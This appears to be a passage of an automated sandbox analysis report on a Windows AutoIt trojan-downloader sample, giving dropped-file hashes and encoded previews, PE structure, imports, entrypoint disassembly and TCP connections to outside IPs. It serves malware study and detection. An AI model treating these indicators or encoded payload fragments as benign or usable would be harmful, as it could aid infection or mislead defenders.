                            Size (bytes):114688
                            Entropy (8bit):0.9746603542602881
                            Encrypted:false
                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\nonsubmerged

                            Download File
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):272384
                            Entropy (8bit):7.994277033599217
                            Encrypted:true
                            SSDEEP:6144:RPzzfbYJ1oqkVcGXqCvcfWNNZt7YZFYx0P5hRK/0SjzU1Zg:NfY2cUvcfWN7t8xLkia
                            MD5:289BD1C11144081228E5152CAD6E9547
                            SHA1:10D1D938B69247EFC94294BD2BE860422D47E16D
                            SHA-256:E9AAA352BCDBE7B8805AC5F438409E241C5E7EC9AB34E479917880E4D06842EE
                            SHA-512:082B5D3C7A0F42BC18481E2C66EE97FBEFF28C3F7B3542F40E679FAFB5ED19CA94BE0D4E9F3DE242794566C76AF2B61B5900AA0DBF67C1EE89DBEC34CE38F601
                            Malicious:false
                            Reputation:low
                            Preview:yi...1URG...L...w.UN...|N]..GVE1URGKC4EJDGTK5UM1F2TMU443GV.1URIT.:E.M.u.4....Z=>uDF\ $$\u1&%-[1j&"t9@;mX(.....Y\#3k<XXcKC4EJDG-J<.pQ!.i-2..S ._...}+$._..h+R.W...h-2.fZ$>xQ2.GKC4EJDG..5U.0G2C<%l43GVE1UR.KA5NKOGT]1UM1F2TMU4D!GVE!URG{G4EJ.GT[5UM3F2RMU443GVC1URGKC4Ez@GTI5UM1F2VM..43WVE!URGKS4EZDGTK5U]1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4k>!? K5U.$B2T]U44%CVE!URGKC4EJDGTK5Um1FRTMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5U

                            C:\Users\user\AppData\Local\Temp\trickstress

                            Download File
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
                            File Type:ASCII text, with very long lines (28674), with no line terminators
                            Category:dropped
                            Size (bytes):28674
                            Entropy (8bit):3.589172367446598
                            Encrypted:false
                            SSDEEP:384:rYzxrp0kEaI5EkuVLXDXurxdmTf+z69p509:rYz7gaI5EkuZDXuOrT509
                            MD5:25AFC2CF4BCC17DD5EFCC970A1E3A0E0
                            SHA1:A5434B5D83EB462BD4BA3789F4513C7EBC227C09
                            SHA-256:D5BC68079E39D7C488BFEB634F340D5E78926B979391945F8202F89075C6E8D5
                            SHA-512:7681CAC3951291E299E565971648D666B2684B8EF999818DA0C5ED4837D4C3FB7E498E4009BFE804823E67E4D2BD59B29EF3F8A898489C406C6586338A55AA8D
                            Malicious:false
                            Reputation:low
                            Preview:1y669cfd92fddd1311116768c97c111111779:5695c:76111111779:5e97cb83111111779:6699c97f111111779:569bc:76111111779:5e9dcb7d111111779:669fc944111111779:56:1c:43111111779:5e:3cb3f111111779:66:5c975111111779:56:7c:7d111111779:5e:9cb7d111111779:66:b44d1779:56:dc:7f111111779:9e55ggggggcb85111111779::657ggggggc975111111779:9659ggggggc:7d111111779:9e5bggggggcb7d111111779::65dggggggc93f111111779:965fggggggc:75111111779:9e61ggggggcb7d111111779::663ggggggc97d111111779:9665gggggg44d:779:9e67ggggggcb86111111779:66e1c984111111779:56e3c:76111111779:5ee5cb83111111779:66e7c944111111779:56e9c:43111111779:5eebcb3f111111779:66edc975111111779:56efc:7d111111779:5ef1cb7d111111779:66f344d1779:56f5c:72111111779:9e79ggggggcb75111111779::67bggggggc987111111779:967dggggggc:72111111779:9e7fggggggcb81111111779::681ggggggc97:111111779:9683ggggggc:44111111779:9e85ggggggcb43111111779::687ggggggc93f111111779:9689ggggggc:75111111779:9e8bggggggcb7d111111779::68dggggggc97d111111779:968fgggggg44d:779:5e91cb84111111779:66b1c979

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.133116241960096
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
                            File size:1'179'136 bytes
                            MD5:13c0e83573fffeb4e951929815daf4e1
                            SHA1:9e1302aaabccb29247948ded46c92fca6d1fa2a0
                            SHA256:d37fe4f855049ecab456f1badc8f52afecf4d6ee3d7d43de84b7e0940dbb7399
                            SHA512:827960af2699a6d39f58d5a47f7070a30d5acbc9db39b680eeac75cdca5fd05746e1d110759cb4bda28d7064f9709d01ab9708febc45be310b987df61de40ab0
                            SSDEEP:24576:zAHnh+eWsN3skA4RV1Hom2KXMmHaf/m+B3rMrKro5:+h+ZkldoPK8YafpiKy
                            TLSH:A445BE0273D2C036FFABA2739B6AF60156BD79254123852F13981DB9BD701B1273E663
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                            File Icon

                            Icon Hash:aaf3e3e3938382a0

                            Static PE Info

                            General

                            Entrypoint:0x42800a
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6695B0E2 [Mon Jul 15 23:29:38 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:afcdf79be1557326c854b6e20cb900a7

                            Entrypoint Preview

                            Instruction
                            call 00007FE790C1718Dh
                            jmp 00007FE790C09F44h
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            push edi
                            push esi
                            mov esi, dword ptr [esp+10h]
                            mov ecx, dword ptr [esp+14h]
                            mov edi, dword ptr [esp+0Ch]
                            mov eax, ecx
                            mov edx, ecx
                            add eax, esi
                            cmp edi, esi
                            jbe 00007FE790C0A0CAh
                            cmp edi, eax
                            jc 00007FE790C0A42Eh
                            bt dword ptr [004C41FCh], 01h
                            jnc 00007FE790C0A0C9h
                            rep movsb
                            jmp 00007FE790C0A3DCh
                            cmp ecx, 00000080h
                            jc 00007FE790C0A294h
                            mov eax, edi
                            xor eax, esi
                            test eax, 0000000Fh
                            jne 00007FE790C0A0D0h
                            bt dword ptr [004BF324h], 01h
                            jc 00007FE790C0A5A0h
                            bt dword ptr [004C41FCh], 00000000h
                            jnc 00007FE790C0A26Dh
                            test edi, 00000003h
                            jne 00007FE790C0A27Eh
                            test esi, 00000003h
                            jne 00007FE790C0A25Dh
                            bt edi, 02h
                            jnc 00007FE790C0A0CFh
                            mov eax, dword ptr [esi]
                            sub ecx, 04h
                            lea esi, dword ptr [esi+04h]
                            mov dword ptr [edi], eax
                            lea edi, dword ptr [edi+04h]
                            bt edi, 03h
                            jnc 00007FE790C0A0D3h
                            movq xmm1, qword ptr [esi]
                            sub ecx, 08h
                            lea esi, dword ptr [esi+08h]
                            movq qword ptr [edi], xmm1
                            lea edi, dword ptr [edi+08h]
                            test esi, 00000007h
                            je 00007FE790C0A125h
                            bt esi, 03h

                            Rich Headers

                            Programming Language:
                            • [ASM] VS2013 build 21005
                            • [ C ] VS2013 build 21005
                            • [C++] VS2013 build 21005
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [ASM] VS2013 UPD5 build 40629
                            • [RES] VS2013 build 21005
                            • [LNK] VS2013 UPD5 build 40629

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x5577c.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x11e0000x7134.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0xc80000x5577c0x55800380ae110705106403ac1817e40c818b3False0.9255042717470761data7.890293250077855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x11e0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xc84a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                            RT_ICON0xc85c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                            RT_ICON0xc88b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                            RT_ICON0xc89d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                            RT_ICON0xc98800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                            RT_ICON0xca1280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                            RT_ICON0xca6900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                            RT_ICON0xccc380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                            RT_ICON0xcdce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                            RT_STRING0xce1480x594dataEnglishGreat Britain0.3333333333333333
                            RT_STRING0xce6dc0x68adataEnglishGreat Britain0.2747909199522103
                            RT_STRING0xced680x490dataEnglishGreat Britain0.3715753424657534
                            RT_STRING0xcf1f80x5fcdataEnglishGreat Britain0.3087467362924282
                            RT_STRING0xcf7f40x65cdataEnglishGreat Britain0.34336609336609336
                            RT_STRING0xcfe500x466dataEnglishGreat Britain0.3605683836589698
                            RT_STRING0xd02b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                            RT_RCDATA0xd04100x4ce14data1.0003366147983488
                            RT_GROUP_ICON0x11d2240x76dataEnglishGreat Britain0.6610169491525424
                            RT_GROUP_ICON0x11d29c0x14dataEnglishGreat Britain1.15
                            RT_VERSION0x11d2b00xdcdataEnglishGreat Britain0.6181818181818182
                            RT_MANIFEST0x11d38c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                            Imports

                            DLLImport
                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                            PSAPI.DLLGetProcessMemoryInfo
                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                            UxTheme.dllIsThemeActive
                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishGreat Britain

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 16, 2024 07:21:44.178109884 CEST4973680192.168.2.43.33.130.190
                            Jul 16, 2024 07:21:44.184111118 CEST80497363.33.130.190192.168.2.4
                            Jul 16, 2024 07:21:44.184273958 CEST4973680192.168.2.43.33.130.190
                            Jul 16, 2024 07:21:44.187586069 CEST4973680192.168.2.43.33.130.190
                            Jul 16, 2024 07:21:44.192498922 CEST80497363.33.130.190192.168.2.4
                            Jul 16, 2024 07:21:44.670972109 CEST80497363.33.130.190192.168.2.4
                            Jul 16, 2024 07:21:44.671099901 CEST80497363.33.130.190192.168.2.4
                            Jul 16, 2024 07:21:44.671164036 CEST4973680192.168.2.43.33.130.190
                            Jul 16, 2024 07:21:44.674781084 CEST4973680192.168.2.43.33.130.190
                            Jul 16, 2024 07:21:44.683383942 CEST80497363.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:07.800796032 CEST4973880192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:07.805980921 CEST80497383.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:07.806163073 CEST4973880192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:07.807704926 CEST4973880192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:07.814413071 CEST80497383.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:08.263324976 CEST80497383.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:08.263413906 CEST4973880192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:09.313399076 CEST4973880192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:09.318510056 CEST80497383.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:10.333174944 CEST4973980192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:10.397901058 CEST80497393.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:10.398085117 CEST4973980192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:10.400645971 CEST4973980192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:10.405529022 CEST80497393.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:10.854345083 CEST80497393.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:10.854463100 CEST4973980192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:11.907160997 CEST4973980192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:11.912221909 CEST80497393.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:12.926646948 CEST4974080192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:12.932468891 CEST80497403.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:12.932760954 CEST4974080192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:12.935842991 CEST4974080192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:12.941206932 CEST80497403.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:12.941237926 CEST80497403.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:12.941289902 CEST80497403.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:12.941318989 CEST80497403.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:12.941370010 CEST80497403.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:12.941397905 CEST80497403.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:12.941431046 CEST80497403.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:12.941483021 CEST80497403.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:12.941529989 CEST80497403.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:13.397353888 CEST80497403.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:13.397695065 CEST4974080192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:14.438375950 CEST4974080192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:14.443382025 CEST80497403.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:15.458031893 CEST4974180192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:15.463154078 CEST80497413.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:15.463330984 CEST4974180192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:15.465100050 CEST4974180192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:15.469907999 CEST80497413.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:15.940253973 CEST80497413.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:15.940316916 CEST80497413.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:15.940457106 CEST4974180192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:15.942595005 CEST4974180192.168.2.43.33.130.190
                            Jul 16, 2024 07:22:15.947426081 CEST80497413.33.130.190192.168.2.4
                            Jul 16, 2024 07:22:21.260024071 CEST4974280192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:21.265403986 CEST8049742216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:21.265764952 CEST4974280192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:21.268296003 CEST4974280192.168.2.4216.194.173.237
                            Jul 16, 2024 07:22:21.273442030 CEST8049742216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:21.846611977 CEST8049742216.194.173.237192.168.2.4
                            Jul 16, 2024 07:22:21.846645117 CEST8049742216.194.173.237192.168.2.4
